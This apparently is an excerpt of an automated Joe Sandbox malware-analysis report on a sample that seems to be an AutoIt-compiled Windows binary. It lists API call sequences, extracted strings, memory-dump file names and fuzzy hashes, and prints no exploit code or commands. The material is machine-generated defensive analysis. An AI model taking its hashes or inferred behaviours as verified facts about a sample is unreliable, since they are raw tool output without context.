                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0051E5F5
                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0051E619
                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0051E644
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0051E66C
                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0051E682
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                              • Opcode ID: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                                                                                                                                              • Instruction ID: 9844af0016f166d0c7f53f5b2eb47698fa0d1f85027bcf7366b8d65e5ac73891
                                                                                                                                                                              • Opcode Fuzzy Hash: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B414775600208AFDB119F64EC89EAFBBB9FF99715F108058F906D7260D731AD45EB20
                                                                                                                                                                              APIs
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00500C93
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500CAB
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500CBD
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500CD2
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500CE6
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00500CFE
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00500D18
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500D2A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 34673085-438819550
                                                                                                                                                                              • Opcode ID: 446aa8006cd8d7c02c663b75639496ed2983c8c9862082792247e06ffbc4bee0
                                                                                                                                                                              • Instruction ID: 9035e5c7dffc336b79db0604b6360ec0ec818193cfb9a5fa56a7e9de0bb77dc9
                                                                                                                                                                              • Opcode Fuzzy Hash: 446aa8006cd8d7c02c663b75639496ed2983c8c9862082792247e06ffbc4bee0
                                                                                                                                                                              • Instruction Fuzzy Hash: 608181715042059FD764DF64C844AAEBBE8BB89314F189D2EF885C72D1EA34DD84CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0051ED0C
                                                                                                                                                                              • GetFocus.USER32 ref: 0051ED1C
                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0051ED27
                                                                                                                                                                              • _memset.LIBCMT ref: 0051EE52
                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 0051EE7D
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0051EE9D
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0051EEB0
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0051EEE4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0051EF2C
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0051EF64
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0051EF99
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                                                                                              • Opcode ID: 9106c1a5e134b7fc79e0773c369a2489426f5baeb659b612221beb0c95dbcdff
                                                                                                                                                                              • Instruction ID: fc0c89bb79763194f44f03b9075f4fec71f3e5c450f0f9ab50927dedab0653a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 9106c1a5e134b7fc79e0773c369a2489426f5baeb659b612221beb0c95dbcdff
                                                                                                                                                                              • Instruction Fuzzy Hash: A6818D71108301AFEB10DF14D886AABBFE8FB88354F04492DFD9997291D730D985DBA2
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                                • Part of subcall function 004EB8E7: HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                                • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                                                                                                                                                • Part of subcall function 004EB982: HeapAlloc.KERNEL32(00000000,?,004EB3E1,?), ref: 004EB995
                                                                                                                                                                                • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB5F7
                                                                                                                                                                              • _memset.LIBCMT ref: 004EB60C
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB62B
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB63C
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004EB679
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB695
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB6B2
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB6C1
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004EB6C8
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB6E9
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 004EB6F0
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB721
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB747
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB75B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3996160137-0
                                                                                                                                                                              • Opcode ID: a480877c8b018204c1516521db1a858807e847d232d87a5525266c8ee9a78e8c
                                                                                                                                                                              • Instruction ID: 6c84a5bc43e2417e83d153ee0013836f26020c2d9307601bb530120de56e279d
                                                                                                                                                                              • Opcode Fuzzy Hash: a480877c8b018204c1516521db1a858807e847d232d87a5525266c8ee9a78e8c
                                                                                                                                                                              • Instruction Fuzzy Hash: 05517D71900249ABCF049FA2DC89EEFBB79FF44745F04811AF911A6390D7349A05DBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0050A2DD
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0050A2E9
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 0050A2F5
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0050A302
                                                                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0050A356
                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0050A392
                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0050A3B6
                                                                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 0050A3BE
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0050A3C7
                                                                                                                                                                              • DeleteDC.GDI32(00000006), ref: 0050A3CE
                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0050A3D9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                              • Opcode ID: 18eb28e15770083e16362202e91e496a774dadeed44fa7350913f61581d588f5
                                                                                                                                                                              • Instruction ID: ba8d197274adda968f6d601194e2de804e3aa196826ba52a737fcee9ad67b098
                                                                                                                                                                              • Opcode Fuzzy Hash: 18eb28e15770083e16362202e91e496a774dadeed44fa7350913f61581d588f5
                                                                                                                                                                              • Instruction Fuzzy Hash: 65513875900309AFCB15CFA8D885AAEBBB9FF48710F14881DF95AA7350D731A945CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EV
                                                                                                                                                                              • API String ID: 3964851224-1416026000
                                                                                                                                                                              • Opcode ID: f03169bd846b2f04c771ebc353d8daa5588d60e4df821bfb6110aaed72cf85fc
                                                                                                                                                                              • Instruction ID: 876a9b93500ca7c123cbfc64231aa2e6786a13f7f900c73cedafc0b3a615c94b
                                                                                                                                                                              • Opcode Fuzzy Hash: f03169bd846b2f04c771ebc353d8daa5588d60e4df821bfb6110aaed72cf85fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F41A5341002468BEF04EF04D860BEA3B62BF2539CF54482DFC525B295DB389E89CBA4
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00523C64,00000010,00000000,Bad directive syntax error,0054DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004F32D1
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00523C64,00000010), ref: 004F32D8
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004F3309
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F332B
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3395
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"W
                                                                                                                                                                              • API String ID: 1506413516-1713381306
                                                                                                                                                                              • Opcode ID: 04cc3f03647bddf45d2c98911af6dec9409b4a3713002e1750deab5543e2a6f5
                                                                                                                                                                              • Instruction ID: ea72c2f0fbeaa3913db87984497da93f9aa006f781ebda5892f86f018ddd4982
                                                                                                                                                                              • Opcode Fuzzy Hash: 04cc3f03647bddf45d2c98911af6dec9409b4a3713002e1750deab5543e2a6f5
                                                                                                                                                                              • Instruction Fuzzy Hash: F621A03190021DBBCF01EFD1CC06EEE7B35BF24705F00085BF505A11A1DAB9AA58DB64
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF), ref: 004FD567
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 004FD589
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD5DC
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD68D
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD6AB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                              • API String ID: 2116804098-2391861430
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 004FD37F
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004FD3A0
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD3F3
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD499
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD4B7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                              • API String ID: 2116804098-3420473620
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • _memset.LIBCMT ref: 004EAF74
                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004EAFA9
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004EAFC5
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004EAFE1
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004EB00B
                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004EB033
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB03E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB043
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                                                                              APIs
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F7226
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F7233
                                                                                                                                                                                • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004F725D
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004F7269
                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004F7276
                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004F7296
                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004F72A8
                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004F72B7
                                                                                                                                                                              • LockResource.KERNEL32(?), ref: 004F72C3
                                                                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004F7322
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                              • String ID: L6V
                                                                                                                                                                              • API String ID: 1433390588-2379597826
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004F843F
                                                                                                                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004F8455
                                                                                                                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004F8466
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004F8478
                                                                                                                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004F8489
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: SendString$_memmove
                                                                                                                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                              • API String ID: 2279737902-1007645807
                                                                                                                                                                              APIs
                                                                                                                                                                              • timeGetTime.WINMM ref: 004F809C
                                                                                                                                                                                • Part of subcall function 004CE3A5: timeGetTime.WINMM(?,76C1B400,00526163), ref: 004CE3A9
                                                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 004F80C8
                                                                                                                                                                              • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 004F80EC
                                                                                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 004F810E
                                                                                                                                                                              • SetActiveWindow.USER32 ref: 004F812D
                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004F813B
                                                                                                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004F815A
                                                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 004F8165
                                                                                                                                                                              • IsWindow.USER32 ref: 004F8171
                                                                                                                                                                              • EndDialog.USER32(00000000), ref: 004F8182
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
